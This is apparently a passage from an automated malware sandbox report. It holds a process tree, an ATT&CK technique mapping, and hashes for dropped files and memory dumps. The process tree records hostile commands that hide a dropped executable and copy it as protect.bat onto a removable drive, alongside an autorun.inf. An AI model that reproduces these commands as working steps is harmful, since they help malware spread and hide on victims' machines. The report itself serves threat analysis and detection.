  "C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\nvidgfx.exe"
  2⤵
  PID:4108
- - C:\Windows\SysWOW64\attrib.exe
    attrib -S -R -H "C:\Users\Admin\AppData\Roaming\nvidgfx.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\nvidgfx.exe" "C:\protect.bat"
  2⤵
  PID:4056
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\nvidgfx.exe" "F:\protect.bat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:412
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\nvidgfx.exe"
  2⤵
  PID:3472
- - C:\Windows\SysWOW64\attrib.exe
    attrib +S +R +H "C:\Users\Admin\AppData\Roaming\nvidgfx.exe"
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:3872
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\nvidgfx.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:624
- - C:\Windows\SysWOW64\attrib.exe
    attrib +S +R +H "C:\Users\Admin\AppData\Roaming\nvidgfx.exe"
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1396
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3436
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H "C:\protect.bat"
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:3092
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4844
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H "F:\protect.bat"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
1⤵
- Drops file in Windows directory
PID:4472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
256KB

MD5
adbd8353954edbe5e0620c5bdcad4363

SHA1
aeb5c03e8c1b8bc5d55683ea113e6ce1be7ac6e6

SHA256
64eff10c4e866930d32d4d82cc88ec0e6f851ac49164122cae1b27eb3c9d9d55

SHA512
87bf4a2dc4dd5c833d96f3f5cb0b607796414ffee36d5c167a75644bcbb02ab5159aa4aa093ed43abe290481abc01944885c68b1755d9b2c4c583fcccd041fd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
1024KB

MD5
2e7a2c89af4d331ba7a01f1584769ba1

SHA1
3011850250b9398d68f8bea61e3ba737b6453511

SHA256
f998da16f659ed330a648df4b8de75e939c6a4098af82a561fd12f2a5c3dcd67

SHA512
fbea81f615c7033acf762c53dbb08a849921d3f72d7755502097a5efd534bb3596c6c9e260b9a0da5e71863bb25b067fc46c59e776391b8cc4ffc1fc42953051

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb

Filesize
68KB

MD5
93cae9bc4a8f4b98ff194011c7340034

SHA1
d826e8ac0b783ead34007a8e7f1c50bf73b3df1b

SHA256
9062a88cbcd89cc2e62a22549e2bbeef36b98f4e27ea62d2347282bb7158f64b

SHA512
582f68ef0b226848a6d49f4cd83722af8a26afe206376196e1365438de1fcab8b728de3f26b2bd83f02fe7e5b84c6ddda498e69acd25f4f16e4f56ef66b050de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

Filesize
498B

MD5
90be2701c8112bebc6bd58a7de19846e

SHA1
a95be407036982392e2e684fb9ff6602ecad6f1e

SHA256
644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf

SHA512
d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
5433eab10c6b5c6d55b7cbd302426a39

SHA1
c5b1604b3350dab290d081eecd5389a895c58de5

SHA256
23dbf7014e99e93af5f2760f18ee1370274f06a453145c8d539b66d798dad131

SHA512
207b40d6bec65ab147f963a5f42263ae5bf39857987b439a4fa1647bf9b40e99cdc43ff68b7e2463aa9a948284126ac3c9c7af8350c91134b36d8b1a9c61fd34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Temp\wmsetup.log

Filesize
1KB

MD5
c66bc2c556367438c522a9b43215975d

SHA1
68bf2516d62af463621e96a0688627f73d6846c8

SHA256
27025182e32e8e5c0d5145166a2e90bc876399f576c4258e9c11c69db787cdf6

SHA512
af2377c1c8c5f82d8afa0c9ba802bb81470266cae43cfe89fe8c4ccb73d89e04c00b0cd033941642df2f431d283e1d0327dea6822dc7ae7fd2aace1f0dcd556f

Download Submit
C:\Users\Admin\AppData\Roaming\auth.dll

Filesize
195KB

MD5
15b8f3be2d9a25def6093dc2d6e1c6b8

SHA1
d9adbe4762882de29e0c1dc4aeddf89016a7f94e

SHA256
6aff3d70fdc4eb3bfaf610fdad422040e25ab82f7d993d88dc94ccd2f5a96c86

SHA512
310a1d6336d4ced1d956fad8b490cafdda697612db0f8e4f98ed7ad76817171cd5af2e8e9778ec803a40a768fa41e52d176f0a2ebc4e6a4182c61b82203d7658

Download Submit
C:\Users\Admin\AppData\Roaming\errorreporter.exe

Filesize
692KB

MD5
479f8bcbe5729d18e3c42a9b4aeddfac

SHA1
dcb37fb7bc0c067c08b4d0b60163b00db59cc411

SHA256
7a8efe13b9e02f29c582541a9890282c1e1004b699463517b5ef1de898db8cd3

SHA512
2f980051619245d1eba473fd43bf4046b3a2504bdf053180b2ae65058faa0a097517111853261ff88da944ec520d659fb2ab0236f966056fb2e0158958e35888

Download Submit
C:\Users\Admin\AppData\Roaming\plugininstall.bat

Filesize
2KB

MD5
9592aa50bf0bfeefbc47eb4bdacfbaab

SHA1
21a7b9683f6f1374f5f785882a1c1bd05f392c9e

SHA256
7a6717ff7d2b63a879b504c0826ec8e3cf25d1616035c8fb70c7d0d932e74ed4

SHA512
bfa01bc5c62dbcb3be8f853ca1f1569600f07a3d54b9e19f93fc2353ad201486074c7b9372721e43fb39b0aa3403b010d31475e4d2de8e74fc9719eda3cbcf00

Download Submit
F:\autorun.inf

Filesize
63B

MD5
f64baf418f685884efec59a9d80bc5f6

SHA1
9c90f7a7efd7ef3059837fdeb06b6b781ca6d1e9

SHA256
4b9870b1f52e252451b3fa099e8b270c32ddc6fc29372067be28dcd009ec4e8f

SHA512
dceecd6a564c974c71ceeb544b0dfde70a09315db6d72a50fdbecdc0cf505a7ce52b7a83a9a8c79e8cfbb996c054585da6d7c08bf0026b4d9ecdde5f0a2b2a69

Download Submit
memory/640-162-0x0000000003510000-0x0000000003549000-memory.dmp

Filesize
228KB

Download
memory/640-0-0x0000000010000000-0x0000000010100000-memory.dmp

Filesize
1024KB

Download
memory/840-81-0x00000000009C0000-0x00000000009C1000-memory.dmp

Filesize
4KB

Download
memory/4048-78-0x0000000000400000-0x00000000004B6000-memory.dmp

Filesize
728KB

Download
memory/4048-82-0x0000000000400000-0x00000000004B6000-memory.dmp

Filesize
728KB

Download
memory/4048-80-0x0000000000400000-0x00000000004B6000-memory.dmp

Filesize
728KB

Download
memory/4048-156-0x0000000000400000-0x00000000004B6000-memory.dmp

Filesize
728KB

Download
memory/4048-95-0x0000000000400000-0x00000000004B6000-memory.dmp

Filesize
728KB

Download
memory/4048-90-0x0000000000400000-0x00000000004B6000-memory.dmp

Filesize
728KB

Download
memory/4048-83-0x0000000000400000-0x00000000004B6000-memory.dmp

Filesize
728KB

Download